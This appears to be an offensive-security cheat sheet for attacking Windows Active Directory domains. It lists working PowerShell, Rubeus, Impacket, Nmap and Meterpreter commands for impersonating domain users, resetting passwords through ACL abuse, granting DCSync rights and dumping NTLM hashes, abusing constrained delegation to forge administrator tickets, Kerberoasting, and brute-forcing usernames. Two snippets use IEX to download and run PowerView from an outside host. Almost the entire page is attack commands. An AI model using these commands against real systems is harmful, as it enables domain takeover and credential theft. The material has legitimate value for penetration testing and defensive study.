PowerSploit
Impersonate Another Domain User
Copy $cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);
Find-DomainShare -ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccess
Invoke-UserImpersonation -Credential $cred
# now we can read the directory impersonating another user if permissions exist:
dir \\fs01.burmat.local\Private```
### Enumerate GPO's
```powershell
"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO
Reset Domain User Password
If you own the owner of another AD user object (WriteOwner
, WriteDACL
, GenericWrite
, Owner
, etc), you can reset the password with ease:
Copy IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
Or if you can set yourself as owner, the following will do:
Copy IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass
Or you can do it using Impacket's "smbpasswd.py", as shown below.
Add/Exploit DCSync Rights
Do you have WriteDACL
to a domain? Give DCSync rights to an unprivileged domain user account:
Copy Add-DomainObjectAcl -TargetIdentity "DC=burmat,DC=local" -PrincipalIdentity jsmith -Rights DCSync
And use these rights to dump the hashes from the domain:
Copy meterpreter > dcsync_ntlm burmat.local\\jsmith
Impacket
Thanks to the impacket toolset, exploiting misconfigurations in AD environments is made easier.
Kerberos
Brute Usernames with Nmap
Copy nmap -v -Pn -p 88 --script krb5-enum-users.nse --script-args "realm='burmat.local', userdb='users.txt'" 10.10.10.123
GenericWrite to Host + User SPN = PWN
If we have GenericWrite
privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity
property against the AD object and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path
Copy ## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};
## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;
Setting an SPN
With setspn.exe
:
Copy setspn -s MSSQLSvc/USER-PC01.burmat.local burmat.local\svc-mssql
setspn -L burmat.local\svc-mssql
# remove with:
setspn -d MSSQLSvc/USER-PC01.burmat.local burmat.local\svc-mssql
ActiveDirectory
module:
Copy Set-ADUser -Identity svc-mssql -ServicePrincipalNames @{Add='MSSQLSvc/USER-PC01.burmat.local','host/USER-PC01.burmat.local'};
# clear them out with
Set-ADUser -Identity svc-mssql -ServicePrincipalNames $Null;
Listing SPNs
Using ldifde
Copy ldifde -d "DC=burmat,DC=local" -l ServicePrincipalName -F C:\SPNs.txt
Using the PowerShell Module ActiveDirectory
Copy Get-ADComputer -Filter * -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames;
Get-ADUser -Filter * -Properties ServicePrincipalNames | Select-Object -ExpandProperty ServicePrincipalNames;
With DirectorySearcher
Copy $s = New-Object DirectoryServices.DirectorySearcher([ADSI]"");
$s.PageSize = 2000;
$s.Filter = "(servicePrincipalName=*)";
$s.FindAll();
Using ldapsearch
https://burmat.gitbook.io/security/hacking/domain-exploitation#ldap-enumeration
Creating a Keytab
Copy ktpass /princ wsman/svc-mssql@burmat.local /mapuser svc-mssql@burmat.local /pass "S3cur3PW123" /out svc-mssql.keytab /crypto all /ptype KRB5_NT_PRINCIPAL /mapop set
Kerberoasting:
Rubeus
Copy rubeus.exe kerberoast /creduser:burmat.local\xsvc /credpassword:S3cur3PW123 /outfile:user.hash
PowerView
Copy Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation
Miscellaneous
Copy # list shared folders
Get-WmiObject -Class Win32_Share -Computer dc1.burmat.local
## get .NET versions installed:
dir C:\Windows\Microsoft.NET\Framework
Last updated 4 months ago